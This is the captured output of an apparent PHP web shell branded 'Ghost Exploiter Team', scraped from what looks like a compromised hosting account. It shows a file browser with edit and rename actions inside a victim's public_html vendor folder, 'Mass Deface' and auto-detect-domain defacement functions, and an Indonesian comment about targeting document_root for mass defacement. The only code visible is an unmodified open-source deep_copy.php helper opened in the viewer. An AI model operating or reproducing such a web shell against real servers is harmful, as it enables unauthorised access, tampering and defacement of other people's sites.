webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
myclabs
/
deep-copy
/
src
/
DeepCopy
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Exception
--
ren
Filter
--
ren
Matcher
--
ren
Reflection
--
ren
TypeFilter
--
ren
TypeMatcher
--
ren
DeepCopy.php
7.979KB
edt
ren
deep_copy.php
0.387KB
edt
ren
<?php namespace DeepCopy; use function function_exists; if (false === function_exists('DeepCopy\deep_copy')) { /** * Deep copies the given value. * * @param mixed $value * @param bool $useCloneMethod * * @return mixed */ function deep_copy($value, $useCloneMethod = false) { return (new DeepCopy($useCloneMethod))->copy($value); } }